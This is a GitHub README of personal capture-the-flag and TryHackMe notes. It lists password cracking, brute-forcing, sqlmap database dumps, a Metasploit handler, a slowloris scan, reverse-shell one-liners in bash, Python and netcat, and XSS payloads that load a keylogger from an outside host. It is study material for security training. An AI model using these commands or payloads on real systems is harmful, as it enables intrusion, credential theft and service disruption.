Skip to content

r0dok/CTF-Writeups

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
THM
THM
 
 
README.md
README.md
 
 

Repository files navigation

🛡️ CTF Writeups

A collection of useful commands and notes for Capture The Flag (CTF) competitions.

📋 Table of Contents

  1. Basic Commands
  2. Advanced Commands
  3. Nmap Usage
  4. Random Points from TryHackMe (THM)
  5. Additional Resources
  6. Conclusion

Basic Commands

  • zip2john: Convert a ZIP file to a format that John the Ripper can crack.

    zip2john file.zip > file.zip.hash
john file.zip.hash

  • gobuster: Directory/file brute-forcing tool.

    gobuster dir -u TARGET -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

  • find: Search for files.

    find / -type f -regex '.*skat.txt$' 2> /dev/null
find / -name findme.txt 2> test.txt

  • nmap: Network scanner.

    nmap -T4 -A -p- TARGET -oN nmap.txt

  • hydra: Password cracking tool.

    hydra -l mark -P /usr/share/wordlists/rockyou.txt IP_Address ssh
hydra -l admin -x 4:4:MLVICDX -vV sshhydra.com ssh
hydra -l admin -P /usr/share/john/password.lst -vV ftplogin.com ftp

Advanced Commands

  • Nmap Scripts: Use NSE scripts to identify vulnerabilities.

    nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p PORT -T4 IP_Address
nmap --script http-slowloris --max-parallelism 400 IP_Address

  • SQLMap: Automatic SQL injection and database takeover tool.

    sqlmap -u "http://target.com/vulnerable_param" --batch --dbs
sqlmap -u "http://target.com/vulnerable_param" -D database_name --tables
sqlmap -u "http://target.com/vulnerable_param" -D database_name -T table_name --columns
sqlmap -u "http://target.com/vulnerable_param" -D database_name -T table_name -C column_name --dump

  • Metasploit: Penetration testing framework.

    msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST your_ip
set LPORT your_port
exploit

  • Burp Suite: Web vulnerability scanner.

    • Intruder: Use Intruder to brute force login forms or find hidden parameters.
    • Repeater: Manually send and analyze HTTP requests.

  • Exploiting SMB:

    smbclient -L //TARGET_IP -U username
smbmap -H TARGET_IP

  • Reverse Shells:

    • Bash: 
      bash -i >& /dev/tcp/your_ip/your_port 0>&1
    • Python: 
      python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("your_ip",your_port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
    • Netcat: 
      nc -e /bin/sh your_ip your_port

Nmap Usage

  • OS Detection: 
    nmap -O TARGET
  • Service Version Detection: 
    nmap -sV TARGET
  • Stealth Scan: 
    nmap -sS TARGET
  • Aggressive Scan: 
    nmap -A TARGET

Random Points from TryHackMe (THM)

  • Popups:

    <script>alert("Hello World")</script>

    Creates a Hello World message popup on a user's browser.

  • Writing HTML:

    document.write("Your HTML code here");

    Override the website's HTML to add your own content.

  • XSS Keylogger: Capture keystrokes of a user.

    <script src="http://www.xss-payloads.com/payloads/scripts/simplekeylogger.js"></script>

  • Port Scanning:

    <script src="http://www.xss-payloads.com/payloads/scripts/portscanapjs.js"></script>

Additional Resources

  • GTFOBins: Unix binaries that can be used to bypass local security restrictions.
  • PayloadAllTheThings: A list of useful payloads and bypasses for Web Application Security.
  • HackTricks: A comprehensive guide for penetration testing and CTF challenges.

About

My CTF notes that I scribbled along the way

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published